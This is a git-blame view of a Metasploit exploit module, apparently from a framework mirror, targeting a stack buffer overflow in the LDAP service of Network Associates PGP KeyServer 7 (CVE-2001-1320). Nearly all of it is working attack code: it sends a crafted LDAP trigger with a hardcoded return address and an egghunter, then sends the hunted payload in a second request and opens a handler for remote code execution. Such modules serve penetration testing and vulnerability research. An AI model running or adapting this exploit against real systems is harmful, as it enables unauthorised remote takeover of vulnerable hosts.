Files
metasploit-gs/modules/exploits/windows/ldap/pgp_keyserver7.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

82 lines
2.4 KiB
Ruby
Raw Normal View History

2010-11-04 15:44:21 +00:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
2010-11-04 15:44:21 +00:00
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2010-11-04 15:44:21 +00:00
Rank = GoodRanking
2013-08-30 16:28:54 -05:00
2010-11-04 15:44:21 +00:00
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Egghunter
2013-08-30 16:28:54 -05:00
2010-11-04 15:44:21 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'Network Associates PGP KeyServer 7 LDAP Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the LDAP service that is
2010-11-04 15:44:21 +00:00
part of the NAI PGP Enterprise product suite. This module was tested
against PGP KeyServer v7.0. Due to space restrictions, egghunter is
used to find our payload - therefore you may wish to adjust WfsDelay.
},
2017-11-09 03:00:24 +11:00
'Author' => [ 'aushack' ],
2010-11-04 15:44:21 +00:00
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2001-1320' ],
[ 'OSVDB', '4742' ],
2010-11-04 15:44:21 +00:00
[ 'BID', '3046' ],
[ 'URL', 'http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ldapv3/' ],
],
'Privileged' => true,
'Payload' =>
{
2010-11-04 23:50:35 +00:00
'Space' => 450,
2010-11-04 15:44:21 +00:00
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
["Universal PGPcertd.exe", { 'Ret' => 0x00436b23 }], # push esp; ret PGPcertd.exe - patrick tested ok 2k/xp
],
2020-10-02 17:38:06 +01:00
'DisclosureDate' => '2001-07-16',
2010-11-04 15:44:21 +00:00
'DefaultTarget' => 0))
2013-08-30 16:28:54 -05:00
2010-11-04 15:44:21 +00:00
register_options(
[
Opt::RPORT(389)
])
2010-11-04 15:44:21 +00:00
end
2013-08-30 16:28:54 -05:00
2010-11-04 15:44:21 +00:00
def exploit
connect
2013-08-30 16:28:54 -05:00
2010-11-04 15:44:21 +00:00
# - Maximum payload space is 102 so we use EggHunter instead.
# - The PAYLOAD is put inside an invalid, rejected (but hunt-able) request.
2013-08-30 16:28:54 -05:00
2010-11-04 15:44:21 +00:00
hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
egg = hunter[1]
2013-08-30 16:28:54 -05:00
2010-11-04 15:44:21 +00:00
eggstart = "\x30\x82\x01\xd9\x02\x01\x01\x60\x82\x01\xd2\x02\x01\x03\x04\x82\x01\xc9" # ldapsearch sniff
eggend = "\x80\x00"
2013-08-30 16:28:54 -05:00
2010-11-04 15:44:21 +00:00
print_status("Sending trigger and hunter first...")
2013-08-30 16:28:54 -05:00
2010-11-04 15:44:21 +00:00
buf = "\x30\xfe\x02\x01\x01\x63\x20\x04\x00\x0a\x01\x02\x0a\x01\x00\x02\x01\x00" # PROTOS suite sniff
buf << [target['Ret']].pack('V') + hunter[0]
buf << "\x00"
2013-08-30 16:28:54 -05:00
2010-11-04 15:44:21 +00:00
sock.put(buf)
2013-08-30 16:28:54 -05:00
2010-11-04 15:44:21 +00:00
disconnect
2013-08-30 16:28:54 -05:00
2010-11-04 15:44:21 +00:00
connect
2013-08-30 16:28:54 -05:00
2010-11-04 15:44:21 +00:00
print_status("Sending hunted payload...")
sock.put(eggstart+egg+eggend)
2013-08-30 16:28:54 -05:00
2010-11-04 15:44:21 +00:00
handler
disconnect
end
end